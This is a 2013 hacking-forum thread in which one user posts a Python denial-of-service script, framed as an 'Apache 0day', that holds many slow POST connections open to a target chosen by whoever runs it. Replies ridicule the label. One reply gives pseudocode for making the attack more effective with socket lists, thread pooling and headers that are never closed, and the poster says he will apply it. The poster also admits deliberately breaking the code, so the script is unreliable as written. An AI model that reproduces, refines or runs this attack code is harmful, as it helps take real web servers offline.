Page 1 of 3

[NEW] Apache 0day!!! only available on HTS [NEW]

PostPosted: Wed Aug 14, 2013 4:05 pm
by Th3_M4d_H4tt3r
Here is the code HTS, this is proof of concept only, use this only on your own servers, I am not responcible for anything you do with this program.
Code: Select all
#!/usr/bin/python

#Apache Exploit developed by Th3_M4d_H4tt3r

#This exploit crashes (and consumes all connections to the server) within seconds.

#Th3_M4d_H4tt3r
#Attack: Infinite
#Defence: Infinite
#Inteligence: N/A
#Age: 13
#Orgin: Wonderland

import socket
from time import sleep
import threading

print "Welcome to Th3_M4d_H4tt3r's 0day Exploit for apache 2.X.X"

RHOST=raw_input("RHOST: ")
RPORT=int(raw_input("RPORT: "))

def PostExploit(HOST, PORT):
   while 1:
      try:
         s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
         s.connect(HOST, PORT)
         s.send('''POST / HTTP/1.1
Host: '''+HOST+'''
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: '''+HOST+''':'''+PORT+'''
Connection: keep-alive
Content-Type: multipart/form-data
Content-Length: 65535

''')
         for i in xrange(0, 65535):
            sleep(1)
            s.send("A")
         s.send("\n\n")
      except:
         pass
count = 0
while 1:
   try:
      Exploit = threading.Thread(target=PostExploit, args=(RHOST, RPORT,))
      Exploit.start()
      count = count+1
      print "Made "+str(count)+" connections."
      print "\033[2A"
   except:
      pass


Do not post this anywere else!

I made some minor tweaks to the code so skids can't use it.

Re: [NEW] Apache 0day!!! only available on HTS [NEW]

PostPosted: Wed Aug 14, 2013 7:50 pm
by F6Zman
Yeah...

If this works, you are really going to please the moronic script kiddies who don't know anything about programming/hacking until this post gets removed.

Disclaimer :
HackThisSite does not support illegal activities.

Re: [NEW] Apache 0day!!! only available on HTS [NEW]

PostPosted: Wed Aug 14, 2013 9:39 pm
by Th3_M4d_H4tt3r
It crashed my web server with 116 connections :D

also, this is not ilegal to post exploit code, unless the application is closed-source; and you posted it with the intent of attacking other servers, yes; it is ilegall.

I have broken no laws.

Re: [NEW] Apache 0day!!! only available on HTS [NEW]

PostPosted: Wed Aug 14, 2013 9:44 pm
by F6Zman
You seem to be quite good at python, how did you learn python?

Re: [NEW] Apache 0day!!! only available on HTS [NEW]

PostPosted: Thu Aug 15, 2013 12:43 am
by apples
this is hilarious! your code sucks.

Re: [NEW] Apache 0day!!! only available on HTS [NEW]

PostPosted: Thu Aug 15, 2013 3:56 am
by ghost107
The code only DOS-ing the Apache server with POST requests, for a good configured server and firewall that isn't even a threat. I wouldn't call it 0 day exploit.

Since your POSTing the data, you will need the file on the Apache to take the data, since no data is taken it will return 4xx and the connection is dropped.

As a suggestion, I wouldn't use a thread based technique(unless you're trying to use cuda threads), because 1 thing about it you will run out of memory before you deny any service(the more threads it creates the slower it gets), I suggest using a IO strategy instead of the Thread based(usually a computer will have around 1000-2000 threads).

Re: [NEW] Apache 0day!!! only available on HTS [NEW]

PostPosted: Fri Aug 16, 2013 11:05 am
by Th3_M4d_H4tt3r
This is a 0day, this is a POST based slowloris for apache, nothing to special.
I could use a random delay (1-3 secs) between thread starting, to attempt to mitigate from IDS or firewall, these normaly look for patterns.

If you guys have any more questions/comments PM me, I will update code if neccasary (sure I am great at python, but spelling :lol: ).

Oh and apples, how can I implement the IO stratagy or cuda threads? This should help improve the code.

Re: [NEW] Apache 0day!!! only available on HTS [NEW]

PostPosted: Fri Aug 16, 2013 1:44 pm
by ghost107
You don't have CUDA in python, for IO Strategy, is to not use threads you only use 1 thread(this is more server side, usually it is used for non-blocking functions), if you want to use a multithreaded model to try to manage the threads(using the thread pooling, python has support for thread pooling).

The Method for thread pooling is simple you have a queue that contains the threads you execute, the queue has a normal limit and a max limit:
-the normal limit is the number of threads you keep in the Pool
-the Max limit is the maximum number of threads you allow

The idea of thread pooling instead of creating new threads you use the same threads over and over to handle your operations, that way you keep the best PC speeds.

Plus I don't see the reason why you use threads for the send function which is a non blocking function(it will not block your program functionality).

If you are talking about slowloris is about sending HTTP requests to the Server that is "thread based" server at regular intervals to not close the connection(and dont close the headers with \r\n\r\n).
For Example:
Code: Select all
You connect to the server:
Send (POST / HTTP/1.1)
send(Host: 'HOST)
your loop{
  Wait few seconds before the socket try's to close
  send (Random Header)
}


Using a IO Strategy is simple, for example:
in this example you can have a list of sockets and the last time the socket was sent.
Code: Select all
your loop{
    Create a socket, and connect to the server
    save your socket in the list
    check your list for available sockets,
     get the new list of available sockets
     For each element in the new  list {
           check the socket status
           reconnect the socket if it needs
           send data
      }
}


You can make it hybrid, by creating channels in different threads(by having thread pooling). this way you keep the connection open and be sure your sockets are open, not creating new connections and then sending data.

In slowloris the headers are never closed, if you close the header you let the server to process the data, and and then evaluates your data(your sending headers at once, while you make a post method)

Re: [NEW] Apache 0day!!! only available on HTS [NEW]

PostPosted: Sat Aug 17, 2013 3:45 am
by Th3_M4d_H4tt3r
That is kind of what I was thinking, I am working on it. 8-)

Re: [NEW] Apache 0day!!! only available on HTS [NEW]

PostPosted: Thu Aug 22, 2013 8:49 am
by Goatboy
... Do you know what 0day means?

This is like 1,467day